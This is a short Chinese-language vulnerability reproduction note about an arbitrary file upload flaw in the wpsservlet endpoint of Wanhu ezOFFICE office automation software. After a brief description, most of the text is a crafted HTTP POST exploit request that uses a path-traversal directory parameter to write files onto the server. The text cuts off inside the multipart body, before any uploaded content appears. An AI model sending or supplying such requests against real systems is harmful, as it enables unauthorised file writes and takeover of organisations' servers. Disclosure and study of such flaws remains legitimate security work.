漏洞描述
万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE wpsservlet存在任意文件上传漏洞。攻击者可以通过此漏洞上传任意文件到目标服务器,导致攻击者可获取服务器控制权限。
漏洞复现
- 构造上传数据包。
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=xxxx&dir=../platform/portal/layout/&fileType=.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 165
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=803e058d60f347f7b3c17fa95228eca6
--803e058d60f347f7b3c17fa95228eca6
Content-Disposition: form-data; name